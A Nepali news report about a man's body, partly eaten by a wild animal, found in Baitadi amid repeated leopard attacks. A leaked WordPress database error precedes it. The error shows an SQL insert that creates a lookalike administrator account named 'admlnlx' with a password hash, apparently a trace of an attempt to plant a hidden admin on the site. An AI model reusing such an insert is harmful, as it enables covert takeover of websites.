WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bi0u.jBTKt1W/BRfFPie.PJ6gL2IEj/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 03:06:19', '', 'admlnlx', 'admlnlx')
बैतडी, मंसिर २४ –
जङ्गली जनावरले आक्रमण गरेको अवस्थामा जिल्लाको तल्लोस्वराडमा बिहीबार बेलुका एक पुरुषकोे बेवारिसे शव फेला परेको छ ।
मेलौली–८ मा अन्दाजी २५ वर्षीय पुरुषको शव जङ्गली जनावरले शरीरको आधा भाग खाएको अवस्थामा रहेको जिल्ला प्रहरी कार्यालय, बैतडीका प्रहरी प्रवक्ता तथा प्रहरी निरीक्षक सुरेन्द्र बमले राससलाई जानकारी दिनुभयो ।
“शरीरको दायाँपट्टिको भाग जङ्गली जनावरले खाएको छ”, उहाँले भन्नुभयो, “हात, कम्मर, टाउको र खुट्टा जङ्गली जनावरले खाएको जस्तो छ ।”
स्थानिय महिला घाँस काट्न गएका बेला भेट्टिएको शव अन्दाजी एक हप्तापहिले मृत्यु भएको हुनसक्ने प्रहरीको अनुमान रहेको छ । यसअघि तल्लोस्वराड क्षेत्रमा चितुवाको आक्रमणमा परी २२ जनाको ज्यान गइसकेको छ । चितुवा मार्न परिचालन गरेको टोली पनि मङ्सिर पहिलो साता फर्किसकेको छ । – रासस